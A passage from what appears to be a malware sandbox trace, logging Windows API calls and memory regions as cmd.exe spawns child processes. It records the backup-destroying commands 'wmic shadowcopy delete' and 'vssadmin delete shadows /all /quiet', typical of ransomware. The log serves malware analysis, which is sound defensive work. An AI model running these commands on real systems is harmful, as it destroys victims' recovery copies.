lpProcessInformation=0x1bf390*(hProcess=0x58, hThread=0x54, dwProcessId=0xf9c, dwThreadId=0xfa0)) returned 1 [0108.925] CloseHandle (hObject=0x54) returned 1 [0108.925] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0108.925] GetProcessHeap () returned 0x360000 [0108.925] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37ba80 | out: hHeap=0x360000) returned 1 [0108.925] GetEnvironmentStringsW () returned 0x37aed0* [0108.925] GetProcessHeap () returned 0x360000 [0108.925] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb9a) returned 0x37ba80 [0108.925] memcpy (in: _Dst=0x37ba80, _Src=0x37aed0, _Size=0xb9a | out: _Dst=0x37ba80) returned 0x37ba80 [0108.925] FreeEnvironmentStringsW (penv=0x37aed0) returned 1 [0108.925] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0148.694] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x1bf2d8 | out: lpExitCode=0x1bf2d8*=0x0) returned 1 [0148.694] CloseHandle (hObject=0x58) returned 1 [0148.694] _vsnwprintf (in: _Buffer=0x1bf548, _BufferCount=0x13, _Format="%08X", _ArgList=0x1bf2e8 | out: _Buffer="00000000") returned 8 [0148.695] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.695] GetProcessHeap () returned 0x360000 [0148.695] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37ba80 | out: hHeap=0x360000) returned 1 [0148.695] GetEnvironmentStringsW () returned 0x37aed0* [0148.695] GetProcessHeap () returned 0x360000 [0148.695] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xbc0) returned 0x37d200 [0148.695] memcpy (in: _Dst=0x37d200, _Src=0x37aed0, _Size=0xbc0 | out: _Dst=0x37d200) returned 0x37d200 [0148.695] FreeEnvironmentStringsW (penv=0x37aed0) returned 1 [0148.695] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.695] GetProcessHeap () returned 0x360000 [0148.695] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37d200 | out: hHeap=0x360000) returned 1 [0148.695] GetEnvironmentStringsW () returned 0x37aed0* [0148.695] GetProcessHeap () returned 0x360000 [0148.695] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xbc0) returned 0x37d200 [0148.695] memcpy (in: _Dst=0x37d200, _Src=0x37aed0, _Size=0xbc0 | out: _Dst=0x37d200) returned 0x37d200 [0148.695] FreeEnvironmentStringsW (penv=0x37aed0) returned 1 [0148.695] GetProcessHeap () returned 0x360000 [0148.695] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37a360 | out: hHeap=0x360000) returned 1 [0148.695] DeleteProcThreadAttributeList (in: lpAttributeList=0x1bf3a8 | out: lpAttributeList=0x1bf3a8) [0148.696] GetConsoleTitleW (in: lpConsoleTitle=0x1bfaa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0148.696] SetErrorMode (uMode=0x0) returned 0x0 [0148.697] SetErrorMode (uMode=0x1) returned 0x0 [0148.697] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x378f40, lpFilePart=0x1bf330 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x1bf330*="Roaming") returned 0x22 [0148.697] SetErrorMode (uMode=0x0) returned 0x1 [0148.697] GetProcessHeap () returned 0x360000 [0148.697] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x378f30, Size=0x60) returned 0x378f30 [0148.697] GetProcessHeap () returned 0x360000 [0148.697] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x378f30) returned 0x60 [0148.697] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5bf360, nSize=0x2000 | out: lpBuffer="") returned 0xc8 [0148.697] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.698] GetProcessHeap () returned 0x360000 [0148.698] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x1ec) returned 0x361c10 [0148.698] GetProcessHeap () returned 0x360000 [0148.698] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x3c8) returned 0x378fa0 [0148.698] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x378fa0, Size=0x1ee) returned 0x378fa0 [0148.698] GetProcessHeap () returned 0x360000 [0148.698] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x378fa0) returned 0x1ee [0148.698] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5bf360, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0148.698] GetProcessHeap () returned 0x360000 [0148.698] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xe8) returned 0x3791a0 [0148.698] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x3791a0, Size=0x7e) returned 0x3791a0 [0148.698] GetProcessHeap () returned 0x360000 [0148.698] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x3791a0) returned 0x7e [0148.698] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0148.698] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wmic.*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0148.699] GetLastError () returned 0x2 [0148.700] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wmic" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0148.700] GetLastError () returned 0x2 [0148.700] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0148.700] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\wmic.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0148.701] GetLastError () returned 0x2 [0148.701] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\wmic" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0148.701] GetLastError () returned 0x2 [0148.701] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0148.702] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0148.702] GetLastError () returned 0x2 [0148.702] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0148.702] GetLastError () returned 0x2 [0148.702] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0148.703] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0148.703] GetLastError () returned 0x2 [0148.703] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic" (normalized: "c:\\windows\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0148.703] GetLastError () returned 0x2 [0148.703] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0148.703] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*" (normalized: "c:\\windows\\system32\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0x379230 [0148.704] FindClose (in: hFindFile=0x379230 | out: hFindFile=0x379230) returned 1 [0148.704] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\system32\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0148.704] GetLastError () returned 0x2 [0148.704] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0x379230 [0148.704] FindClose (in: hFindFile=0x379230 | out: hFindFile=0x379230) returned 1 [0148.705] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.705] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.705] GetConsoleTitleW (in: lpConsoleTitle=0x1bf5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0148.705] InitializeProcThreadAttributeList (in: lpAttributeList=0x1bf3a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1bf368 | out: lpAttributeList=0x1bf3a8, lpSize=0x1bf368) returned 1 [0148.705] UpdateProcThreadAttribute (in: lpAttributeList=0x1bf3a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1bf358, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1bf3a8, lpPreviousValue=0x0) returned 1 [0148.705] GetStartupInfoW (in: lpStartupInfo=0x1bf4c0 | out: lpStartupInfo=0x1bf4c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0148.705] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.705] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpStartupInfo=0x1bf3e0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic shadowcopy delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1bf390 | out: lpCommandLine="wmic shadowcopy delete", lpProcessInformation=0x1bf390*(hProcess=0x54, hThread=0x58, dwProcessId=0xcac, dwThreadId=0xca8)) returned 1 [0148.713] CloseHandle (hObject=0x58) returned 1 [0148.713] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.713] GetProcessHeap () returned 0x360000 [0148.713] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37d200 | out: hHeap=0x360000) returned 1 [0148.713] GetEnvironmentStringsW () returned 0x37aed0* [0148.713] GetProcessHeap () returned 0x360000 [0148.713] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xbc0) returned 0x37d200 [0148.713] memcpy (in: _Dst=0x37d200, _Src=0x37aed0, _Size=0xbc0 | out: _Dst=0x37d200) returned 0x37d200 [0148.713] FreeEnvironmentStringsW (penv=0x37aed0) returned 1 [0148.714] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0149.986] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1bf2d8 | out: lpExitCode=0x1bf2d8*=0x0) returned 1 [0149.986] CloseHandle (hObject=0x54) returned 1 [0149.987] _vsnwprintf (in: _Buffer=0x1bf548, _BufferCount=0x13, _Format="%08X", _ArgList=0x1bf2e8 | out: _Buffer="00000000") returned 8 [0149.987] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.987] GetProcessHeap () returned 0x360000 [0149.987] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37d200 | out: hHeap=0x360000) returned 1 [0149.987] GetEnvironmentStringsW () returned 0x37aed0* [0149.987] GetProcessHeap () returned 0x360000 [0149.987] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xbc0) returned 0x37d200 [0149.987] memcpy (in: _Dst=0x37d200, _Src=0x37aed0, _Size=0xbc0 | out: _Dst=0x37d200) returned 0x37d200 [0149.987] FreeEnvironmentStringsW (penv=0x37aed0) returned 1 [0149.987] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.987] GetProcessHeap () returned 0x360000 [0149.987] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37d200 | out: hHeap=0x360000) returned 1 [0149.987] GetEnvironmentStringsW () returned 0x37aed0* [0149.987] GetProcessHeap () returned 0x360000 [0149.987] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xbc0) returned 0x37d200 [0149.987] memcpy (in: _Dst=0x37d200, _Src=0x37aed0, _Size=0xbc0 | out: _Dst=0x37d200) returned 0x37d200 [0149.987] FreeEnvironmentStringsW (penv=0x37aed0) returned 1 [0149.987] GetProcessHeap () returned 0x360000 [0149.987] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x376040 | out: hHeap=0x360000) returned 1 [0149.987] DeleteProcThreadAttributeList (in: lpAttributeList=0x1bf3a8 | out: lpAttributeList=0x1bf3a8) [0149.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.987] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.988] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5be194 | out: lpMode=0x4a5be194) returned 1 [0149.988] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.988] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5be198 | out: lpMode=0x4a5be198) returned 1 [0149.988] SetConsoleInputExeNameW () returned 0x1 [0149.988] GetConsoleOutputCP () returned 0x1b5 [0149.988] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5cbfe0 | out: lpCPInfo=0x4a5cbfe0) returned 1 [0149.989] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0149.989] exit (_Code=0) Process: id = "4" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x34932000" os_pid = "0xf9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xf84" cmd_line = "vssadmin delete shadows /all /quiet " cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1151 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1152 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1153 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1154 start_va = 0x200000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1155 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1156 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1157 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1158 start_va = 0xfff70000 end_va = 0xfff9cfff monitored = 0 entry_point = 0xfff90384 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 1159 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1160 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1161 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1162 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1163 start_va = 0x280000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1164 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1165 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1166 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1167 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1168 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1169 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1170 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1171 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1172 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1173 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1174 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1175 start_va = 0x7fefb350000 end_va = 0x7fefb368fff monitored = 0 entry_point = 0x7fefb3511a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1176 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1177 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1178 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1179 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1180 start_va = 0x7fefa380000 end_va = 0x7fefa396fff monitored = 0 entry_point = 0x7fefa381060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1181 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1182 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1183 start_va = 0x7fefa3a0000 end_va = 0x7fefa54ffff monitored = 0 entry_point = 0x7fefa3a1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1184 start_va = 0xc0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1185 start_va = 0x280000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1186 start_va = 0x3a0000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1187 start_va = 0x4a0000 end_va = 0x627fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1188 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1189 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1190 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1191 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1192 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1193 start_va = 0x630000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 1194 start_va = 0x7c0000 end_va = 0x1bbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 1195 start_va = 0xc0000 end_va = 0xccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 1196 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1197 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1198 start_va = 0x150000 end_va = 0x1ccfff monitored = 0 entry_point = 0x15cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1199 start_va = 0x150000 end_va = 0x1ccfff monitored = 0 entry_point = 0x15cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1200 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1201 start_va = 0x1cf0000 end_va = 0x1d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 1202 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1203 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1204 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1205 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1206 start_va = 0x1d80000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1207 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1208 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1209 start_va = 0x150000 end_va = 0x194fff monitored = 0 entry_point = 0x151064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1210 start_va = 0x150000 end_va = 0x194fff monitored = 0 entry_point = 0x151064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1211 start_va = 0x150000 end_va = 0x194fff monitored = 0 entry_point = 0x151064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1212 start_va = 0x150000 